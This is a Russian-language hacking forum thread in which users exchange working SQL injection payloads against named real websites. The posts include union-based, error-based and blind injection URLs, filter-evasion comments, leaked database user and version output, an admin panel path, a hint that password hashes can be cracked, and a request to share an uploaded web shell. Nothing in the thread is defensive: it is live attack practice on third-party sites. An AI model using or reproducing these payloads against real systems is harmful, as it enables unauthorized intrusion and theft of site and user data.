А сами не умеете вообще? учитесь. http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1 пароль есть на cmd5 админка по адресу stop-obman.ru/backend будет
спасибо большое, а вы как я вижу шелл залили? если можно в лс дайте. да тренируюсь на Linux kali, читаю. учусь. и еще вопрос, это точно md5 да ?
phpMyAdmin/scripts/setup.php.Что можете посоветовать? http://s020.radikal.ru/i723/1510/c2/4993371de002.png Еще раз,извиняюсь.
С твоей непонятно, но есть другая: http://www.regard.ru/comparen.htm?i...Value(1,concat(0x3a,(select(version())))))='1 или http://www.regard.ru/comparen.htm?id=e345280615ca44adab458f949c114de1a'+union+select+1,user()+--+ regard@localhost 5.5.44-0+deb7u1-log Вывод в самом низу страницы (проще в коде глянуть)
там тоже работает, если передать массив вместо строки. 2 all. перестаньте постить нераскрученные скули и отчеты ваших сканеров. старайтесь все делать сами, а если что то и не выходит то опишите конкретно проблему, что именно не получаеться.
1) почитал обе статьи (http://www.securitylab.ru/news/470546.php) есть проблемы, например при запросе пишет как то решается эта проблема? 2) нашел нужные мне таблицу и колонку тоесть ответ зх как составить запрос чтобы хотяб через блинд вывести данные
Хелп. Тема такая, не могу вывести данные. Code: http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,/*!unhex(hex(group_concat(table_name)))*/,26,27,28,29 from {f information_schema.tables} --+ or ''=' в schema_name есть twinsspe_twins, но не выводится из неё инфа. скорей всего нету там просто ничего.
http://kvestsetevichok.ru/index.php/press?view=category&id=' что то можно сделать? ибо не получается изменить запрос никак
Зачем вы кавычку вконце поставили я вообще не пойму. Unknown column 'root' in 'where clause' Обычная ошибка бд, никакой sql inj
ну как бы, tab_06 tab_06=2619+and+1=1 [true=>корректрый вывод] tab_06=2619+and+1=2 [false=>пустой вывод]
